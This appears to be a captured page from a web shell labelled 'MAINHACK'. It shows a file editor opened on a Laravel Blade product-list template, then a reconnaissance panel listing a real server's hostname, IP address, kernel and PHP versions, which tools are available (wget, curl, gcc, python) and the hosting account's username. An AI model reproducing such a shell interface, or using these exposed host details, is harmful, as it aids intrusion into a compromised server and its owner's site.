[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: product_list.blade.php
@forelse($products as $product) <div class="col-md-3 col-xs-4 product_list no-print"> <div class="product_box hover:tw-shadow-lg hover:tw-animate-pulse" data-variation_id="{{$product->id}}" title="{{$product->name}} @if($product->type == 'variable')- {{$product->variation}} @endif {{ '(' . $product->sub_sku . ')'}} @if(!empty($show_prices)) @lang('lang_v1.default') - @format_currency($product->selling_price) @foreach($product->group_prices as $group_price) @if(array_key_exists($group_price->price_group_id, $allowed_group_prices)) {{$allowed_group_prices[$group_price->price_group_id]}} - @format_currency($group_price->price_inc_tax) @endif @endforeach @endif"> <div class="image-container" style="background-image: url( @if(count($product->media) > 0) {{$product->media->first()->display_url}} @elseif(!empty($product->product_image)) {{asset('/uploads/img/' . rawurlencode($product->product_image))}} @else {{asset('/img/default.png')}} @endif ); background-repeat: no-repeat; background-position: center; background-size: contain;"> </div> <div class="text_div"> <small class="text text-muted">{{$product->name}} @if($product->type == 'variable') - {{$product->variation}} @endif </small> <small class="text-muted"> ({{$product->sub_sku}}) </small><br> <small class="text-muted" style="font-size: 60%;"> @if($product->enable_stock) {{ @num_format($product->qty_available) }} {{$product->unit}} @lang('lang_v1.in_stock') @else -- @endif </small> </div> </div> </div> @empty <input type="hidden" id="no_products_found"> <div class="col-md-12"> <h4 class="text-center"> @lang('lang_v1.no_products_to_display') </h4> </div> @endforelse
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285